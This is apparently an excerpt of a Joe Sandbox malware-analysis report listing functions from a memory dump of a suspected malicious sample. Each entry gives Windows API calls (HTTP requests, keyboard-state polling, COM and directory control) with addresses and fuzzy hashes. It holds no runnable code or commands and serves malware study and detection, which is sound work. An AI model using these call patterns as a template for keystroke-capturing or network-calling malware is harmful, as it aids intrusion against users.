                                                                                               • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 354098117-199464113
                                                                                              • Opcode ID: 72592cf3b8cf9b6b9fcd31227dc97b462f2e5d2f2365a6fc8414fafedd95f85c
                                                                                              • Instruction ID: 7e40b637fe9e8817d908ebec6d02fb56ddfb4f7954c06d238d651622e021d4ba
                                                                                              • Opcode Fuzzy Hash: 72592cf3b8cf9b6b9fcd31227dc97b462f2e5d2f2365a6fc8414fafedd95f85c
                                                                                              • Instruction Fuzzy Hash: D3124B71A00245EFDB14DF95C884EAEB7B5FF49718F288098F909AB251D731ED42CBA0
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DDCE0D
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DDCE20
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DDCE34
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DDCE4D
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DDCE90
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DDCEA6
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DDCEB1
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DDCEE1
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DDCF39
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DDCF4D
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00DDCF58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 3800310941-3916222277
                                                                                              • Opcode ID: 7a5f7c0c49da92acedff8d492dbf4c98acb3e40ad3bd3f01c311d4f601b8cd88
                                                                                              • Instruction ID: 3b3ab6f6268dfc0c97b1584bbdcc7a614b0073f4b75bb2c25a630b4d0f9a07eb
                                                                                              • Opcode Fuzzy Hash: 7a5f7c0c49da92acedff8d492dbf4c98acb3e40ad3bd3f01c311d4f601b8cd88
                                                                                              • Instruction Fuzzy Hash: E05147B151130ABFDB219F60C988ABA7BBEEF08754F14941AF946D6310D734E944EBB0
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00E32990,000000FF,00000000,00000030), ref: 00DCC888
                                                                                              • SetMenuItemInfoW.USER32(00E32990,00000004,00000000,00000030), ref: 00DCC8BD
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00DCC8CF
                                                                                              • GetMenuItemCount.USER32(?), ref: 00DCC915
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00DCC932
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00DCC95E
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00DCC9A5
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DCC9EB
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DCCA00
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DCCA21
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                              • String ID: 0
                                                                                              • API String ID: 1460738036-4108050209
                                                                                              • Opcode ID: 9819d12e3f18dbcfe99b2bccde11ba0c8164c295948d0610cf916f50efb7cd39
                                                                                              • Instruction ID: a0afeb22feeb22c23995fb982bc5d21287ba676dca288136cd0a0e20c0da3c9c
                                                                                              • Opcode Fuzzy Hash: 9819d12e3f18dbcfe99b2bccde11ba0c8164c295948d0610cf916f50efb7cd39
                                                                                              • Instruction Fuzzy Hash: A6615BB091024AAFDB11CF64D888FBEBBA9EB05305F185119EA49E3251DB34ED45CB70
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DCE3E9
                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DCE40F
                                                                                              • _wcslen.LIBCMT ref: 00DCE419
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00DCE469
                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DCE485
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 1939486746-1459072770
                                                                                              • Opcode ID: b2b02ef0c46b7b3b2e68139a8abff41ec662c44a7c1895434fe3f34b72719104
                                                                                              • Instruction ID: 0c4586f3f27df48fd7f56ccd8a814cad616b94e544ef54715333cb4335ea492e
                                                                                              • Opcode Fuzzy Hash: b2b02ef0c46b7b3b2e68139a8abff41ec662c44a7c1895434fe3f34b72719104
                                                                                              • Instruction Fuzzy Hash: 8B4101B26403197AEB04BB649C47EBE7BADDF45320F14405AF940E71C2EB78DA0193B5
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DD469A
                                                                                              • _wcslen.LIBCMT ref: 00DD46C7
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD46F7
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DD4718
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00DD4728
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DD47AF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DD47BA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DD47C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 1149970189-3457252023
                                                                                              • Opcode ID: d7b12649d8dd20127137c62a0ef75a086ac3a86fdceb604126ac578700d2db44
                                                                                              • Instruction ID: 1a6cadb186b256e1eb48456755c18c428c2249479c205ea5b309bf3ecf40247a
                                                                                              • Opcode Fuzzy Hash: d7b12649d8dd20127137c62a0ef75a086ac3a86fdceb604126ac578700d2db44
                                                                                              • Instruction Fuzzy Hash: 8731B271900219BBDB209FA0DC89FEB37BEEF89740F1441A6F619D6260E7709644CB74
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00DCA8EE
                                                                                              • SetKeyboardState.USER32(?), ref: 00DCA959
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00DCA979
                                                                                              • GetKeyState.USER32(000000A0), ref: 00DCA990
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00DCA9BF
                                                                                              • GetKeyState.USER32(000000A1), ref: 00DCA9D0
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00DCA9FC
                                                                                              • GetKeyState.USER32(00000011), ref: 00DCAA0A
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00DCAA33
                                                                                              • GetKeyState.USER32(00000012), ref: 00DCAA41
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00DCAA6A
                                                                                              • GetKeyState.USER32(0000005B), ref: 00DCAA78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 652b9b27317e37e46b190b744ab24181d4f9a822009a332ddc622e560e9423e4
                                                                                              • Instruction ID: f49e8efe9cacb1e7668918175d47283946402bf0e2ad7964ca5684c7b91ce3a1
                                                                                              • Opcode Fuzzy Hash: 652b9b27317e37e46b190b744ab24181d4f9a822009a332ddc622e560e9423e4
                                                                                              • Instruction Fuzzy Hash: 0951F82090478E6AEB35E7B44815FEABFB49F11348F4C858EC5C25B1C2DA649A4CCB72
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00DC6571
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DC658A
                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DC65E8
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00DC65F8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DC660A
                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DC665E
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00DC666C
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DC667E
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DC66C0
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00DC66D3
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DC66E9
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC66F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 3800e673757c4a48ab0c84376965827a14cf10da0c6957b662dcc3119965f4b4
                                                                                              • Instruction ID: b5420188497842e168468e3f8b26022e53667d767ff714db4deee6c20db315e7
                                                                                              • Opcode Fuzzy Hash: 3800e673757c4a48ab0c84376965827a14cf10da0c6957b662dcc3119965f4b4
                                                                                              • Instruction Fuzzy Hash: 71510E71A0020AAFDF08CF68DD89AAE7BB6BB48301F148129F915E7294D770DD04CB60
                                                                                              APIs
                                                                                                • Part of subcall function 00D621E4: GetWindowLongW.USER32(?,000000EB), ref: 00D621F2
                                                                                              • GetSysColor.USER32(0000000F), ref: 00D62102
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 3a7fefcd72798cb66eed4cdb8dbef641e6282496651be06066daaa908411a2cb
                                                                                              • Instruction ID: 75a0083e765e032c81a4fba0e0022f52dae6b5222482c9870be74b2edfd38301
                                                                                              • Opcode Fuzzy Hash: 3a7fefcd72798cb66eed4cdb8dbef641e6282496651be06066daaa908411a2cb
                                                                                              • Instruction Fuzzy Hash: A0419131544B44AFDB205F38DC48BBA3B67AB47321F188645FAA28B2E1C7359D42DB30
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DF499A
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00DF49A1
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DF49B4
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00DF49BC
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DF49C7
                                                                                              • DeleteDC.GDI32(00000000), ref: 00DF49D1
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00DF49DB
                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00DF49F1
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00DF49FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              • API String ID: 2559357485-2160076837
                                                                                              • Opcode ID: 4f46a1cd80174cdc42c7f13f9e73163d955b4cad39013ae2f4bd714a03a39b2f
                                                                                              • Instruction ID: 8c76ca3d5a8ac387b0994f58ee979560ea1d8f46033078a195968c46afe5e115
                                                                                              • Opcode Fuzzy Hash: 4f46a1cd80174cdc42c7f13f9e73163d955b4cad39013ae2f4bd714a03a39b2f
                                                                                              • Instruction Fuzzy Hash: F0316E32100219ABDF119FA4DC08FEB3BAAFF09724F168215FA55E61A0D775D810DB74
APIs
• VariantInit.OLEAUT32(?), ref: 00DE45B9
• CoInitialize.OLE32(00000000), ref: 00DE45E7
• CoUninitialize.OLE32 ref: 00DE45F1
• _wcslen.LIBCMT ref: 00DE468A
• GetRunningObjectTable.OLE32(00000000,?), ref: 00DE470E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00DE4832
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DE486B
• CoGetObject.OLE32(?,00000000,00E00B64,?), ref: 00DE488A
• SetErrorMode.KERNEL32(00000000), ref: 00DE489D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DE4921
• VariantClear.OLEAUT32(?), ref: 00DE4935
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: 4c4eaba06fb2ecf3e54bf7c11ff821dfbef922b4301cb5e8da1e7ec2e86b8797
• Instruction ID: 2c213f4a1d5170e3f520c7927bb2b7c9ea66e2a90533b84e5c37796658057323
• Opcode Fuzzy Hash: 4c4eaba06fb2ecf3e54bf7c11ff821dfbef922b4301cb5e8da1e7ec2e86b8797
• Instruction Fuzzy Hash: 3AC133B16043419FC700EF69C88492BBBE9FF89748F14491DF98A9B251DB31ED05CBA2
APIs
• CoInitialize.OLE32(00000000), ref: 00DD844D
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DD84E9
• SHGetDesktopFolder.SHELL32(?), ref: 00DD84FD
• CoCreateInstance.OLE32(00E00CD4,00000000,00000001,00E27E8C,?), ref: 00DD8549
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DD85CE
• CoTaskMemFree.OLE32(?,?), ref: 00DD8626
• SHBrowseForFolderW.SHELL32(?), ref: 00DD86B1
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DD86D4
• CoTaskMemFree.OLE32(00000000), ref: 00DD86DB
• CoTaskMemFree.OLE32(00000000), ref: 00DD8730
• CoUninitialize.OLE32 ref: 00DD8736
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 5783514481677cb7d6973a2fb4f6527c4f9678906c409729d16fc9437174cbd7
• Instruction ID: 19239f785a9c459ef218f263c0cafaf95964e81f61950127eb77800d77c2e054
• Opcode Fuzzy Hash: 5783514481677cb7d6973a2fb4f6527c4f9678906c409729d16fc9437174cbd7
• Instruction Fuzzy Hash: A1C11875A00209AFCB14DFA4C884DAEBBF9FF48354B148199E41AEB361CB31ED45DB60
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DC033F
• SafeArrayAllocData.OLEAUT32(?), ref: 00DC0398
• VariantInit.OLEAUT32(?), ref: 00DC03AA
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00DC03CA
• VariantCopy.OLEAUT32(?,?), ref: 00DC041D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00DC0431
• VariantClear.OLEAUT32(?), ref: 00DC0446
• SafeArrayDestroyData.OLEAUT32(?), ref: 00DC0453
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DC045C
• VariantClear.OLEAUT32(?), ref: 00DC046E
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DC0479
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 73f2e10b548b515beb06a4230c36c739d488fc34e886b40d1329188162425fa2
• Instruction ID: 1836cd29d2f4fd68e92507cca8bdbccbd94ff3058db51a13d2acb52e067e8c49
• Opcode Fuzzy Hash: 73f2e10b548b515beb06a4230c36c739d488fc34e886b40d1329188162425fa2
• Instruction Fuzzy Hash: E6412C75A00219DFCB14DFA8D844EAEBFBAEF48354F008469E955E7261D730A945CBB0
APIs
  • Part of subcall function 00D62441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D62452
• GetSystemMetrics.USER32(0000000F), ref: 00DFA926
• GetSystemMetrics.USER32(0000000F), ref: 00DFA946
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00DFAB83
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DFABA1
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DFABC2
• ShowWindow.USER32(00000003,00000000), ref: 00DFABE1
• InvalidateRect.USER32(?,00000000,00000001), ref: 00DFAC06
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00DFAC29
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-3916222277
• Opcode ID: 90330df99a9494eed9133d02c300d67f1653a686c8881a03e7a8999dc5a6c242
• Instruction ID: c2c449aa89bcea8e22461ae4941436d7a7a4decc0af895a9d4ce27113634b662
• Opcode Fuzzy Hash: 90330df99a9494eed9133d02c300d67f1653a686c8881a03e7a8999dc5a6c242
• Instruction Fuzzy Hash: 5FB17B75600219DFDF14CF2DC9857BA7BB2BF44701F0AC069EE899B295D730A944CB61
APIs
• GetLocalTime.KERNEL32(?), ref: 00DD8BB1
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00DD8BC1
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DD8BCD
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD8C6A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8C7E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8CB0
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DD8CE6
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8CEF
Strings
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: e3c7cb24b791120cf1066f683038069397294243e79562d6c40d909fb7db2f1f
• Instruction ID: 42bc1c5c0e747d08d78245def4c7a39432de6eeae4fae57da8893c916ed01d60
• Opcode Fuzzy Hash: e3c7cb24b791120cf1066f683038069397294243e79562d6c40d909fb7db2f1f
• Instruction Fuzzy Hash: 316137B25043059FC710EF64C844AAEB3E9FF89314F04891AE99997251EB35E945CBB2
APIs
• CreateMenu.USER32 ref: 00DF45D8
